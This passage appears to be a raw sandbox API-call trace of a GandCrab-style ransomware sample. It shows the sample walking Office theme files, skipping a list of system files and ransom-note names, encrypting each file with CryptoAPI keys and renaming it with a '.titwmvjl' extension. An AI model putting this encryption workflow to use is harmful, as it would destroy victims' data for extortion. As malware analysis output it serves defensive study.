(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx") returned 136 [0075.028] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="desktop.ini") returned 1 [0075.028] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="autorun.inf") returned 1 [0075.028] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="ntuser.dat") returned 1 [0075.028] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="iconcache.db") returned 1 [0075.028] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="bootsect.bak") returned 1 [0075.028] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="boot.ini") returned 1 [0075.028] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="ntuser.dat.log") returned 1 [0075.028] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="thumbs.db") returned 1 [0075.028] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0075.028] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0075.028] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0075.028] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0075.028] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0075.028] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0075.028] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="ntldr") returned 1 [0075.028] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="NTDETECT.COM") returned 1 [0075.029] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="Bootfont.bin") returned 1 [0075.029] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx") returned 136 [0075.029] lstrlenW (lpString=".thmx") returned 5 [0075.029] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.029] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0075.029] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.029] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.029] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457491[[fn=metropolitan]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0075.030] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.030] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0075.043] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.043] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.043] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0075.044] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0075.044] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0075.044] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0075.044] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0075.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.044] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.044] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.044] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0075.045] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0075.045] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0075.045] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0075.045] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0075.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.045] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.045] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.046] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0075.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.046] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5034f8) returned 1 [0075.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.046] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0075.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.047] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0075.047] GetLastError () returned 0x0 [0075.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.047] CryptDestroyKey (hKey=0x5034f8) returned 1 [0075.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.047] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.047] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0075.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.048] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503738) returned 1 [0075.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.048] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0075.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.048] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0075.048] GetLastError () returned 0x0 [0075.049] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.049] CryptDestroyKey (hKey=0x503738) returned 1 [0075.049] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.049] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.049] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0075.049] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0075.049] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0xbddaf, lpOverlapped=0x0) returned 1 [0075.080] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff42251, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.080] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0xbddaf, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0xbddaf, lpOverlapped=0x0) returned 1 [0075.086] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.086] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0075.087] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.091] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.094] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.094] CloseHandle (hObject=0x2ec) returned 1 [0075.104] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457491[[fn=metropolitan]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457491[[fn=metropolitan]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0075.104] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.105] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0075.105] lstrcmpW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2=".") returned 1 [0075.105] lstrcmpW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="..") returned 1 [0075.105] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457496[[fn=Parallax]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx" [0075.105] lstrlenW (lpString=".titwmvjl") returned 9 [0075.105] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx") returned 132 [0075.105] VirtualAlloc (lpAddress=0x0, dwSize=0x148, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0075.105] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx.titwmvjl") returned 141 [0075.105] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx") returned 132 [0075.105] lstrlenW (lpString=".thmx") returned 5 [0075.105] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.105] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0075.105] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0075.105] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.106] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx") returned 132 [0075.106] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx") returned 132 [0075.106] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="desktop.ini") returned 1 [0075.106] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="autorun.inf") returned 1 [0075.106] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="ntuser.dat") returned 1 [0075.106] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="iconcache.db") returned 1 [0075.106] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="bootsect.bak") returned 1 [0075.106] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="boot.ini") returned 1 [0075.106] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="ntuser.dat.log") returned 1 [0075.106] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="thumbs.db") returned 1 [0075.106] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0075.106] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0075.106] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0075.106] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0075.106] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0075.106] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0075.106] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="ntldr") returned 1 [0075.106] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="NTDETECT.COM") returned 1 [0075.106] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="Bootfont.bin") returned 1 [0075.106] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx") returned 132 [0075.106] lstrlenW (lpString=".thmx") returned 5 [0075.106] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.106] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0075.106] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.106] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.107] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457496[[fn=parallax]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0075.107] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.107] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0075.113] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.113] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.113] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0075.114] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0075.114] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0075.114] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0075.114] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0075.114] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.114] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.114] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.115] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0075.115] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0075.115] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0075.115] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0075.115] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0075.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.116] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.116] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.116] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.116] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0075.116] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.116] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5032f8) returned 1 [0075.116] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.116] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0075.117] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.117] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0075.117] GetLastError () returned 0x0 [0075.117] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.117] CryptDestroyKey (hKey=0x5032f8) returned 1 [0075.117] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.117] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.117] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.117] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0075.118] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.118] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503938) returned 1 [0075.118] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.118] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0075.118] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.118] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0075.118] GetLastError () returned 0x0 [0075.118] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.119] CryptDestroyKey (hKey=0x503938) returned 1 [0075.119] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.119] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.119] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0075.119] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0075.119] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0xe1c0f, lpOverlapped=0x0) returned 1 [0075.157] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff1e3f1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.157] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0xe1c0f, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0xe1c0f, lpOverlapped=0x0) returned 1 [0075.163] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.163] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0075.164] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.169] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.173] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.173] CloseHandle (hObject=0x2ec) returned 1 [0075.189] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457496[[fn=parallax]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457496[[fn=parallax]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0075.190] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.190] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0075.190] lstrcmpW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2=".") returned 1 [0075.190] lstrcmpW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="..") returned 1 [0075.191] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457503[[fn=Quotable]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx" [0075.191] lstrlenW (lpString=".titwmvjl") returned 9 [0075.191] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx") returned 132 [0075.191] VirtualAlloc (lpAddress=0x0, dwSize=0x148, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0075.191] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx.titwmvjl") returned 141 [0075.191] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx") returned 132 [0075.191] lstrlenW (lpString=".thmx") returned 5 [0075.191] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.191] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0075.191] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0075.191] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.192] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx") returned 132 [0075.192] 